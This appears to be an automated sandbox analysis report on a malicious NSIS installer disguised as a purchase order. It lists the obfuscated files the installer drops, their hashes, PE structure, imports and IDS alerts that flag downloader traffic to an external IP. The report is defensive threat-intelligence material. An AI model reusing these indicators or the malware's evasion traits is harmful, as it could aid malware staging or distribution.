                                                                    C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):11264
                                                                    Entropy (8bit):5.770803561213006
                                                                    Encrypted:false
                                                                    SSDEEP:192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
                                                                    MD5:2AE993A2FFEC0C137EB51C8832691BCB
                                                                    SHA1:98E0B37B7C14890F8A599F35678AF5E9435906E1
                                                                    SHA-256:681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
                                                                    SHA-512:2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: PO-000041522.exe, Detection: malicious, Browse
                                                                    • Filename: PO-000041522.exe, Detection: malicious, Browse
                                                                    • Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious, Browse
                                                                    • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                    • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                    • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                    • Filename: cuenta iban-ES65.exe, Detection: malicious, Browse
                                                                    • Filename: rResegregation.exe, Detection: malicious, Browse
                                                                    • Filename: rResegregation.exe, Detection: malicious, Browse
                                                                    • Filename: W1nnerFree CS2.exe, Detection: malicious, Browse
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Redamation.Nyk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):149100
                                                                    Entropy (8bit):4.5927109777566155
                                                                    Encrypted:false
                                                                    SSDEEP:3072:n/fnJh9wbYm/+4bdKB2UAj++eFMf/XQMWVwv:X9wbYs+4bwtI4jwv
                                                                    MD5:421A6E691BF1E11F6269EBA35642D518
                                                                    SHA1:CCAEBD5063934644EDCE97B06A593F31D00AE4E6
                                                                    SHA-256:4730C80B0C78B905D42BE22E39BB0553FF66D18FE3F72E956EE95C4E425516B6
                                                                    SHA-512:9EA15D0B75F3A9F455BD25ECFD3A1AAB7764C528A8C2092B73F0C2226DFFB8666873EAAC6A86C30FF44431C93090ADCDAA911AA3AF2825B3542B48C5F92ACFB2
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:...c.....;......pp.......................................................HHH.........................LL..........]]................xxxx.....hh..qqq..........h....~~~.........4.......`.....k...l.......!..............u...........``..............ll..*......,................>>>.........--.k.;.....0..FFF...p........r.LLLL..6666......FF...((......WW...............PPPPPPP......{........O.......p.!.0...................N.......................9...#................d...+...i............{......%.......G..........GGG.|.......4..__.....b...........................WW...........(((.......FFFF....].....x....m...........::::::.......j...............fff...Z. .oooo.o...TTT..........\\................QQQ..........|......NN...............jj...TT.....................i.....n...""".i.............eee.......((((. ...'...L...........+++.........x....<<<.....>>>.............G...........T.....9..............n.~....;..V...............tt.............6.o........OOOO........t......j.....l.......3333..E.TT.=..........W

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\Transfunderedes\uhviskes.com

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):489577
                                                                    Entropy (8bit):1.2547186421876628
                                                                    Encrypted:false
                                                                    SSDEEP:1536:E/ujv57uZhomnVCSJm9XbVL7qQ/NAq6gusqocKJjh8zOdV:E/67S/n5mpLH/RusDlT
                                                                    MD5:917EE012CBF9DD581CA73C76C7FE4CA0
                                                                    SHA1:0C99AC2CAEED895B940935D72A2A5FD3176D8C85
                                                                    SHA-256:09B342C70E64D68438917385DD67258EF7C4A2E4D6ED923BC52525A40540698A
                                                                    SHA-512:AE2552898CA689DE35FC21E6F36E38CF1B2F6CE623B70CA4EF4FF5B18DB863059CBE8EADEEA9A18CEEAD756AC4B25E812F52B012E6E32CBC3F26C18393259324
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:..............v.........................................................................................................................._X......k............b.........J...................................X....................................................................................................|........Z..........................].............................................:...*......#.........................................................*.....................................................O..............................O..................................................................................E............................U........................................E........................................:........D..................................................g...Q.................................................................................z..=........................E..%............................................................................*..........

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\absumption.kor

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):371165
                                                                    Entropy (8bit):1.2513716385265512
                                                                    Encrypted:false
                                                                    SSDEEP:768:Sj9TDV4iwR5i6JNPLINN0L+xs+EkTFvjCbJt1zs8kCmx+87wymjP6IzDWZ0rQPyQ:Asy0kRS/GkjABLBfp92S
                                                                    MD5:C639B5AEA098D21378EFE3AD3A554633
                                                                    SHA1:0E10CDE4A6AD7B89BB3FD1628C6D025BF466989B
                                                                    SHA-256:28FA6948793CA0E3C62F408CD9E546169C227B17F96C9CF3B9112E6980A503A1
                                                                    SHA-512:8312B421FC185D5ECBE5ED3854F9B54589F3142214196DF8EC8DAA71911F06F04283ED9EEA1DE213CD5B03EBA9AB1DDC95F39685E737201519FD9DC5369164EE
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.............q.............................................&.......................\............................................................J]..................................................|...............P..........................................................d......................................................r..........................................................I..................................#...................!..............9...........................................................................6...................................G...........O..........................................................................2...C..................4......................................................................................T...............................X.......................................................................................4.................8.........~...................i......6....+........E.h........g.................{..............&.

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\autographist.udd

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):474733
                                                                    Entropy (8bit):1.2605066942170449
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Kps3n4nM/CfcQfsOj6JcTW81rboM0aADXq34CpG0OC:Cenqxv0OBTpQMLo
                                                                    MD5:D52ECA89A6A6583AA5868C668B52F497
                                                                    SHA1:82BF52ABA58EDBB83EBB92C01EAAC9CA37189D9F
                                                                    SHA-256:0ECDFEF080A86A8F200ED06CA6067273A1105F1914DEAE7D92E09B873ABCF83C
                                                                    SHA-512:6607B8EBB9CC607D3531799052DC6F4F478E4326B5E6E803401E545DD5338815FA80B6E6E61509C1BA2B5719F6A80A681B7EA101540979A4C7D52863D8831E24
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Preview:.....a.....................!...........................................................,.............v.............................................}..................G..................................................._..............J................S.........................................................................A........................................................LS3............................................................................E...................................^.........s........ .h.............................&.?...................6..................;............C.....(.............s.....................M......................X.....................n..............................................................................................................:.;....................*.....`......_...................................................f........................................?..........`...U@.......;..............................D.......2........

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\hornfisks.woo

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                    Category:dropped
                                                                    Size (bytes):227593
                                                                    Entropy (8bit):1.245920806085396
                                                                    Encrypted:false
                                                                    SSDEEP:768:3FhKKzByuBwwTbYXu9OgQhU0e6nWp1ZWY4+7j8nc+kf5GfMw1ZK8In+/JNS3xOnr:SepZWYpAGLQIM+q
                                                                    MD5:9A1B6F2854A5B3F5E97159F4D30C47B3
                                                                    SHA1:C9B33BDD32498DCCB62D229C95608AD0F8655BA3
                                                                    SHA-256:6A5ECDC720F8A9DC660732354490F997C5D46C1E7BDF97FE0129D31D5C231021
                                                                    SHA-512:4F74B2F52F66768B670DD65D42414464630C99637004A7560DDFCB52CEA706A659EA4F382C169DB740B8DD59BC15FE604F0A6F2B3164EE3D09046AAC83C6FD53
                                                                    Malicious:false
                                                                    Preview:.......................:............G3........u.......................O..........5...........O...........................................................................................K...................j..1...........[................U....................l...........................................y...........`......................................F........................................................................................................................................................................O...B.......g............E........................................................=.........................9...H........................................L.............................u................................................................................................................4..............................................j..%.....................8............J...........................................................................................v....

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\lighty.sto

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):327412
                                                                    Entropy (8bit):1.2530468011510671
                                                                    Encrypted:false
                                                                    SSDEEP:768:aBILyFjGgwtorVDke1ghsijjk5HkK7lHTeeVybsz2dzpMuDx+Hmoy1f4fZDXCTqJ:94bZ/PRHoZSZdGU6lJ8/fqAGC
                                                                    MD5:EB81829745DF6650D0C09CBADCADB6FD
                                                                    SHA1:4FA3AA68D878034C8AAF56013C403A0540B93AF4
                                                                    SHA-256:9DD8E06CAF3EA5960465EB5466FE13ED3F41FE276C1D7314373ECF3993DFB992
                                                                    SHA-512:7EFE0B56249B05AFB8AA1C6EFABC773E65D19ABD773F3F462691539F4DCA5AF06B0F7A291FE1E3F4B535A01D7A34E6ACB6C720F0A6C1959FB871635F68463CD3
                                                                    Malicious:false
                                                                    Preview:..........i..............................................................................................;............................~...........................F....................._.......n...b........$.............<...........................................................................................^.................................................e...........................J.........................&..................................o................................f..............~...........................................................O.....$.!.................:..................9...9........]...............................................I........................................................N}............4.........................a..T..........g....................................K.............................[......o..............................................................J..........................L.......................;...............................)....

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\nonarbitrable.txt

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):364
                                                                    Entropy (8bit):4.3235645552878115
                                                                    Encrypted:false
                                                                    SSDEEP:6:oiK7uqJ3jJ/b1w8IDz5E1WZVpVMmhE4HBFqTZWMWFXijWYBLSWDuPM5iSubpQpZu:oh7uSW68ZVpVekB6ZWMWdgrvDY+inyAT
                                                                    MD5:C2A47524DCF9687FA180FA2E3F8A4362
                                                                    SHA1:1C6D3ACC056ECECE019DE3EE9977DA451E4A6379
                                                                    SHA-256:FDBBF1DFDC69C2B28CFF480273FB9D83A217D699D708105B7166CD0BE5627218
                                                                    SHA-512:DE30697525C80EE8D1DCE3437374D83A6CA49C8CF11C73BDE2DEB26CA40B1F7ED7298F0871A8F32770C16F8CC944A2072CF4906CF130F50A9F4AB4C30E557E2C
                                                                    Malicious:false
                                                                    Preview:sheitan interruptable lsesummen,mercurialising engage rilievo fringe dobbeltdomicilernes chionodoxa chromascope,udreder leveraging lippering.bldsden vagtselskabers dentalized prussianised demifusion nachas..reboards skildvagter versiculi planetarily seksualhygiejnens bryllupsmarchens..strophe transformative unshapenly pharmacopeial afskedshilsners udsalgssteder.

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\spokesmen.thr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):264011
                                                                    Entropy (8bit):1.2602368630758787
                                                                    Encrypted:false
                                                                    SSDEEP:768:x1U384UpGgVCi2XHks9XVNargfQMkIRUpbvS2h2BjyujykSAtE1blsA9IiPi9OhW:x1Uz+6EuhMbJkzpAq+Kk0
                                                                    MD5:D9EB4DA16650571C58C1B347FB8D27F1
                                                                    SHA1:C02B382B23D249C7FAAF45D8191F64871FA025A5
                                                                    SHA-256:17A67A6731D1EF2DFE9C0A1E52CA0589968E9F61FF52FBE67B39DC3E39D36CFF
                                                                    SHA-512:B437679FD218DBC6CDA0C1EA598B597389E34BBAA3DE913CFEC564E226D3D55E84B4290CA076A6DC66E7018EE95AE1EE6007DB19F87DC68B459FCAFAF34D8E9D
                                                                    Malicious:false
                                                                    Preview:....o../._r.............................5...E.................................................................................p..............................>R.s....................................M.....R..........................................`.x.........q..............................................................OG.D..........................<.................(....................................................................d...............................n...........................................r....n........................e.....................d.......................................................................g..f..........J.....................................................................L....t..................8.........................................p....f....................................g..............................................D.....C............z..........................................................................................#............

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Trangsvurderingens\stumprumpet.und

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):438970
                                                                    Entropy (8bit):1.254355464810577
                                                                    Encrypted:false
                                                                    SSDEEP:768:bzV5RkJ99odavaG4W/vwV9bW9Iy6F5XTP/BtOax/XXluFr9jT6nHttP+Uf6FAqj3:P/vAoMGFHEUaviFWCDH1M5AOfE
                                                                    MD5:CA0365FACD33769129F762C843983283
                                                                    SHA1:E6C95B658A13E598AE6AF5F71A0D577C84BE7B26
                                                                    SHA-256:C8ED8546722F12C51800EDAEB09F659B59CFA6B8B8E3B0FDC55267A7E5560A20
                                                                    SHA-512:AE3ED0C51571CC90F65A8E58744E4002302E43B3D40E71C87A0223DEB7E9C5DFD1370C0AB1262E12F900E6A85C5CEA82B115D5EC8697CEF9F5EFAF555D2153C7
                                                                    Malicious:false
                                                                    Preview:............................................-..D..2............................................................`................................[...........................................s..........................................................`.......{.......................................i................s........................{..............D.........g......:.....................C...........................................................................................6...................4.-..................................................S............................a......................................................N.+............................................................................................................................................................................_.T.....................................................................................................(...........%............................A.......................................

                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\snrkler\blaamunkerne\Vvstypernes.Kip

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):397463
                                                                    Entropy (8bit):7.6041948582257115
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TwUNcvIcaJuDN7kf9ayFt2D2ilY/wqavY/WXMOSZyGwXRCgdSdPv:M7v7Cmm91DwqZ/GM1wBCWSRv
                                                                    MD5:02E622DDF81785F4767032D5E8DB7262
                                                                    SHA1:8A2DD01E7CA1A096A421D3FF6E052567A37F84E9
                                                                    SHA-256:C413FCB833CA6BD78CC195FA4DB14256FB79592475DB91B0FBA932D333D536B8
                                                                    SHA-512:AB617A8710FA80715F567DD03B45B209FB1999EBDBFDA263CAEFE65F01C6E744912BD4BFA291DF6B6AAB351A2E7C0E1825470676FFF21524083E7BC6DEC8EA80
                                                                    Malicious:false
                                                                    Preview:.cc........aaaa....O....LL......x................:..........D.........................__........................qq.$$.++.................I.................vvv.........2.....(((....$$$..eee.....bbb.................;..............r..e.##.m..........LLL.......w....4....5+.........4r.].m......W.<YF...BIw..l.,..f....a....0.......b.....`.8".O .7j...........R...G8..........f.h..5..).....p..}..'TVNg......?Q_6.../;.-C.."d%.h..Z.U.#..H.E.....7%\>...e...1z..J0..k....x....*Ko.DA.....L(...~...s.23........;.!....t.u.............&......9a-....{.........5+.....f.........=...4r.].m......W.<YF...BIw..l.,..~.......b.....`.8".O ...W.xf.i....#j...........R...G8.......).....p....n.....0..'TVNg......?Q_6.../;.-C.."d%.h..Z.U.#.%\>...f...f......,...1z..J0..k....x....*Ko.DA.....L(...~....I...........23..!....t.u.............&......9a-....{.......t.....5.....5+.........4r.].m......W.<YF...BIw..l.,......q.c...0.......b.....`.8".O .7j...........R...G8......"c.......

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.985778364989345
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:PO-10212024168877 PNG2023-W101.exe
                                                                    File size:918'336 bytes
                                                                    MD5:e7504a48d78545ef459890b5c36b6b17
                                                                    SHA1:7dd9b7b12c2a58f83235edd771801bae8b94b6f3
                                                                    SHA256:7d0590445da76f1149aefce04bc517b15b330871cd3bd8c196a032e28588ee9e
                                                                    SHA512:debd95e4955e2d07459336bd572df515aa0baffbdc736ea4ea0e0214b3d88e8d75c94f955090f6b65cfbc31456704b01371194d768f56f25363a9801fc7b7424
                                                                    SSDEEP:24576:LC84KQgxA541tRNeB+ihvheI+op15CQN08KXQoGxq:dNxA54rRwB+ihj+HQk98q
                                                                    TLSH:0E15236255FD5A03F336A2708D6F7B5A5CB72DC0083310376B223B665C3EAE9B21596C
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L....c.W.................^....9....

                                                                    File Icon

                                                                    Icon Hash:43caa1a1a185ada9

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x4030ec
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5795637F [Mon Jul 25 00:55:27 2016 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                                    Authenticode Signature

                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=Fellifluous, O=Fellifluous, L=Noyal-sur-Vilaine, C=FR
                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                    Error Number:-2146762487
                                                                    Not Before, Not After
                                                                    • 29/11/2023 05:29:46 28/11/2026 05:29:46
                                                                    Subject Chain
                                                                    • CN=Fellifluous, O=Fellifluous, L=Noyal-sur-Vilaine, C=FR
                                                                    Version:3
                                                                    Thumbprint MD5:BB730EF06FEAC92031A32EB3E64DA9D7
                                                                    Thumbprint SHA-1:94015799792140B863341F079827FE8696F4FD67
                                                                    Thumbprint SHA-256:24E7F2711FAB55DD21662745411BA6363E016C6367C4634E2C5CA47EF46E4580
                                                                    Serial:1B5AEF7D872DDCBC040160974F2262F5E2404F23

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    sub esp, 00000184h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+18h], ebx
                                                                    mov dword ptr [esp+10h], 00409198h
                                                                    mov dword ptr [esp+20h], ebx
                                                                    mov byte ptr [esp+14h], 00000020h
                                                                    call dword ptr [004070A8h]
                                                                    call dword ptr [004070A4h]
                                                                    cmp ax, 00000006h
                                                                    je 00007F2D355563D3h
                                                                    push ebx
                                                                    call 00007F2D35559341h
                                                                    cmp eax, ebx
                                                                    je 00007F2D355563C9h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 00407298h
                                                                    push esi
                                                                    call 00007F2D355592BDh
                                                                    push esi
                                                                    call dword ptr [004070A0h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], bl
                                                                    jne 00007F2D355563ADh
                                                                    push ebp
                                                                    push 00000009h
                                                                    call 00007F2D35559314h
                                                                    push 00000007h
                                                                    call 00007F2D3555930Dh
                                                                    mov dword ptr [007A1F44h], eax
                                                                    call dword ptr [00407044h]
                                                                    push ebx
                                                                    call dword ptr [00407288h]
                                                                    mov dword ptr [007A1FF8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+38h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 0079D500h
                                                                    call dword ptr [00407174h]
                                                                    push 00409188h
                                                                    push 007A1740h
                                                                    call 00007F2D35558F37h
                                                                    call dword ptr [0040709Ch]
                                                                    mov ebp, 007A8000h
                                                                    push eax
                                                                    push ebp
                                                                    call 00007F2D35558F25h
                                                                    push ebx
                                                                    call dword ptr [00407154h]

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3be0000xe18.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xdf1000x1240.data
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x5db60x5e00f367801e476b699be2b532039e0b583cFalse0.6806848404255319data6.508470969322742IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x90000x3990380x40029ebcbec0bd7bd0fecb3d2937195c560unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .ndata0x3a30000x1b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x3be0000xe180x1000bfb4537f3eb7566a74ccdeac7c775284False0.352783203125data3.842480295105669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x3be2080x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23655913978494625
                                                                    RT_DIALOG0x3be4f00x100dataEnglishUnited States0.5234375
                                                                    RT_DIALOG0x3be5f00x11cdataEnglishUnited States0.6056338028169014
                                                                    RT_DIALOG0x3be7100xc4dataEnglishUnited States0.5918367346938775
                                                                    RT_DIALOG0x3be7d80x60dataEnglishUnited States0.7291666666666666
                                                                    RT_GROUP_ICON0x3be8380x14dataEnglishUnited States1.15
                                                                    RT_VERSION0x3be8500x288dataEnglishUnited States0.5108024691358025
                                                                    RT_MANIFEST0x3bead80x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                                    Imports

                                                                    DLLImport
                                                                    KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                                    USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                    ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-10-29T20:37:35.807943+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84997662.215.181.250443TCP
                                                                    2024-10-29T20:37:37.732080+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84997762.215.181.250443TCP
                                                                    2024-10-29T20:37:39.641205+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84997862.215.181.250443TCP
                                                                    2024-10-29T20:37:41.591458+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84997962.215.181.250443TCP
                                                                    2024-10-29T20:37:43.528233+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84998062.215.181.250443TCP
                                                                    2024-10-29T20:37:45.434865+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84998162.215.181.250443TCP
                                                                    2024-10-29T20:37:47.357938+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84998262.215.181.250443TCP
                                                                    2024-10-29T20:37:49.306233+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84998362.215.181.250443TCP
                                                                    2024-10-29T20:37:51.423389+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84998462.215.181.250443TCP
                                                                    2024-10-29T20:37:53.374891+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84998562.215.181.250443TCP
                                                                    2024-10-29T20:37:55.330913+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84998662.215.181.250443TCP
